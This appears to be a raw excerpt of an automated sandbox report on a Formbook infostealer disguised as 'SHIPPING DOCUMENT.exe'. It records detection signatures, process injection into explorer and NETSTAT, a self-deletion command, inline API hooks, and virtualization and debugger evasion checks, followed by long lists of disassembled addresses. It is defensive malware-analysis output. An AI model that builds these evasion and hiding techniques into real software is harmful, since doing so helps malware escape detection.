          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@4/5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nseA920.tmpJump to behavior
          Source: SHIPPING DOCUMENT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SHIPPING DOCUMENT.exeVirustotal: Detection: 34%
          Source: SHIPPING DOCUMENT.exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile read: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess created: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe'
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: SHIPPING DOCUMENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: SHIPPING DOCUMENT.exe, 00000000.00000003.656956738.0000000003270000.00000004.00000001.sdmp, SHIPPING DOCUMENT.exe, 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SHIPPING DOCUMENT.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeUnpacked PE file: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041E560 push ss; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0391D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDCF6C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDCF0B push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDCF02 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDE560 push ss; ret
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE6
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002DC98E4 second address: 0000000002DC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002DC9B5E second address: 0000000002DC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 5192Thread sleep count: 38 > 30
          Source: C:\Windows\explorer.exe TID: 5192Thread sleep time: -76000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6944Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.680284032.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.926975780.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.680284032.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.924340020.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.680444387.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.680488183.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.675794110.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_022B182F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_022B1617 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACF358 mov eax, dword ptr fs:[00000030h]
